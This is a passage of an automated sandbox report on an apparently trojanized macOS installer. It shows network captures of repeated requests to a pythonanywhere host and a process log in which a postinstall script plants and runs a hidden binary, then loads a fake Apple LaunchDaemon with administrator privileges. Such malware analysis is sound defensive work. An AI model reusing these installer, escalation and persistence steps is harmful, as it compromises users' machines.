20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73
                                                                                                    Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You can develop and hos
                                                                                                    Jul 1, 2020 14:19:35.864993095 MESZ112INData Raw: 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 0a 20 20 20 20 20 20
                                                                                                    Data Ascii: t your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Upgraded plans start a
                                                                                                    Jul 1, 2020 14:19:35.865006924 MESZ113INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 74 74 69 6e 67 20 69 74 20 61 6c 6c 20 77 6f 72 6b 69 6e 67 2c 20 64 72 6f 70 20 75 73 20 61 20 6c 69 6e 65 20 61 74 0a
                                                                                                    Data Ascii: If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the forums</a>, or using the "


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    2192.168.0.514928935.173.69.20780
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jul 1, 2020 14:19:37.673650026 MESZ114OUTGET /ret.txt HTTP/1.0
                                                                                                    Host: andrewka6.pythonanywhere.com
                                                                                                    Jul 1, 2020 14:19:37.764440060 MESZ115INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 01 Jul 2020 12:19:37 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 2921
                                                                                                    Connection: close
                                                                                                    ETag: "5ece92c1-b69"
                                                                                                    Server: PythonAnywhere
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73
                                                                                                    Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You can develop and hos
                                                                                                    Jul 1, 2020 14:19:37.764457941 MESZ116INData Raw: 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 0a 20 20 20 20 20 20
                                                                                                    Data Ascii: t your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Upgraded plans start a
                                                                                                    Jul 1, 2020 14:19:37.764476061 MESZ117INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 74 74 69 6e 67 20 69 74 20 61 6c 6c 20 77 6f 72 6b 69 6e 67 2c 20 64 72 6f 70 20 75 73 20 61 20 6c 69 6e 65 20 61 74 0a
                                                                                                    Data Ascii: If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the forums</a>, or using the "


                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                    3192.168.0.514929035.173.69.20780
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Jul 1, 2020 14:19:38.233485937 MESZ117OUTGET /ret.txt HTTP/1.0
                                                                                                    Host: andrewka6.pythonanywhere.com
                                                                                                    Jul 1, 2020 14:19:38.322874069 MESZ119INHTTP/1.1 404 Not Found
                                                                                                    Date: Wed, 01 Jul 2020 12:19:38 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 2921
                                                                                                    Connection: close
                                                                                                    ETag: "5ece92c1-b69"
                                                                                                    Server: PythonAnywhere
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3a 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 72 65 62 75 63 68 65 74 20 4d 53 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 66 6f 72 2d 73 69 74 65 2d 6f 77 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2d 65 72 72 6f 72 2d 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 32 33 34 78 33 35 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 69 73 20 69 73 20 67 6f 69 6e 67 20 74 6f 20 62 65 20 61 6e 6f 74 68 65 72 20 67 72 65 61 74 20 77 65 62 73 69 74 65 20 68 6f 73 74 65 64 20 62 79 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 79 74 68 6f 6e 61 6e 79 77 68 65 72 65 2e 63 6f 6d 2f 22 3e 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 50 79 74 68 6f 6e 41 6e 79 77 68 65 72 65 20 6c 65 74 73 20 79 6f 75 20 68 6f 73 74 2c 20 72 75 6e 2c 20 61 6e 64 20 63 6f 64 65 20 50 79 74 68 6f 6e 20 69 6e 20 74 68 65 20 63 6c 6f 75 64 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4f 75 72 20 66 72 65 65 20 70 6c 61 6e 20 67 69 76 65 73 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 6d 61 63 68 69 6e 65 73 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 76 65 72 79 74 68 69 6e 67 20 61 6c 72 65 61 64 79 20 73 65 74 20 75 70 20 66 6f 72 20 79 6f 75 2e 20 59 6f 75 20 63 61 6e 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 68 6f 73
                                                                                                    Data Ascii: <html> <head> <title>Coming Soon: PythonAnywhere</title> <style> body { font-family: Helvetica, Arial, sans-serif; width: 500px; margin-left: auto; margin-right: auto; margin-top: 20px; } h1 { font-family: Trebuchet MS, Helvetica, Arial, sans-serif; } .for-site-owner { font-size: smaller; margin-top: 30px; color: gray; } </style> </head> <body> <img src="https://s3.amazonaws.com/pythonanywhere-error-images/logo-234x35.png" /> <div class="main"> <h1>Coming Soon!</h1> <p> This is going to be another great website hosted by <a href="https://www.pythonanywhere.com/">PythonAnywhere</a>. </p> <p> PythonAnywhere lets you host, run, and code Python in the cloud. Our free plan gives you access to machines with everything already set up for you. You can develop and hos
                                                                                                    Jul 1, 2020 14:19:38.322968006 MESZ120INData Raw: 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 72 20 61 6e 79 20 6f 74 68 65 72 20 63 6f 64 65 20 64 69 72 65 63 74 6c 79 20 66 72 6f 6d 20 79 6f 75 72 20 62 72 6f 77 73 65 72 0a 20 20 20 20 20 20
                                                                                                    Data Ascii: t your website or any other code directly from your browser without having to install software or manage your own server. </p> <p> Need more power? Upgraded plans start a
                                                                                                    Jul 1, 2020 14:19:38.322988033 MESZ121INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 49 66 20 79 6f 75 27 72 65 20 68 61 76 69 6e 67 20 70 72 6f 62 6c 65 6d 73 20 67 65 74 74 69 6e 67 20 69 74 20 61 6c 6c 20 77 6f 72 6b 69 6e 67 2c 20 64 72 6f 70 20 75 73 20 61 20 6c 69 6e 65 20 61 74 0a
                                                                                                    Data Ascii: If you're having problems getting it all working, drop us a line at support@pythonanywhere.com, or in <a href="https://www.pythonanywhere.com/forums/">the forums</a>, or using the "


                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Start time:14:18:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/xpcproxy
                                                                                                    Arguments:n/a
                                                                                                    File size:44048 bytes
                                                                                                    MD5 hash:4782e7ebd2985d32bc84f1f71c8f8fb7

                                                                                                    General

                                                                                                    Start time:14:18:50
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer
                                                                                                    Arguments:/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer
                                                                                                    File size:290816 bytes
                                                                                                    MD5 hash:93dd388d90b35bc29b3f6cd499ace778

                                                                                                    General

                                                                                                    Start time:14:18:52
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/xpcproxy
                                                                                                    Arguments:n/a
                                                                                                    File size:44048 bytes
                                                                                                    MD5 hash:4782e7ebd2985d32bc84f1f71c8f8fb7

                                                                                                    General

                                                                                                    Start time:14:18:52
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    Arguments:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File size:24768 bytes
                                                                                                    MD5 hash:c94a70b5dcbe257244d585c24b6073bb

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/install_monitor
                                                                                                    Arguments:n/a
                                                                                                    File size:29680 bytes
                                                                                                    MD5 hash:964f9b8d501b66bb0b3a81af2049ccc9

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/shove
                                                                                                    Arguments:n/a
                                                                                                    File size:42400 bytes
                                                                                                    MD5 hash:520466cdb513e143c03cb24b2e974c22

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/tmp/PKInstallSandbox.rmbAho/Scripts/com.mixedinkey.installer.YPgB1A/postinstall
                                                                                                    Arguments:n/a
                                                                                                    File size:190 bytes
                                                                                                    MD5 hash:03fc4e3ef9bdbccd7ea68537970ce472

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/mkdir
                                                                                                    Arguments:mkdir /Library/mixednkey
                                                                                                    File size:18592 bytes
                                                                                                    MD5 hash:0948c3e8dfd7f3d3628ca8b819092ccf

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/mv
                                                                                                    Arguments:mv /Applications/Utils/patch /Library/mixednkey/toolroomd
                                                                                                    File size:24240 bytes
                                                                                                    MD5 hash:71b4f7c9a383f7c62c738273039ba658

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/rmdir
                                                                                                    Arguments:rmdir /Application/Utils
                                                                                                    File size:18176 bytes
                                                                                                    MD5 hash:a900434ad49b67ad1b43d3dc47fe74ef

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/chmod
                                                                                                    Arguments:chmod +x /Library/mixednkey/toolroomd
                                                                                                    File size:30016 bytes
                                                                                                    MD5 hash:d7df83ea3a49de5d07e0c1730e910852

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:31
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/Library/mixednkey/toolroomd
                                                                                                    Arguments:/Library/mixednkey/toolroomd
                                                                                                    File size:87920 bytes
                                                                                                    MD5 hash:322f4fb8f257a2e651b128c41df92b1d

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:19:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
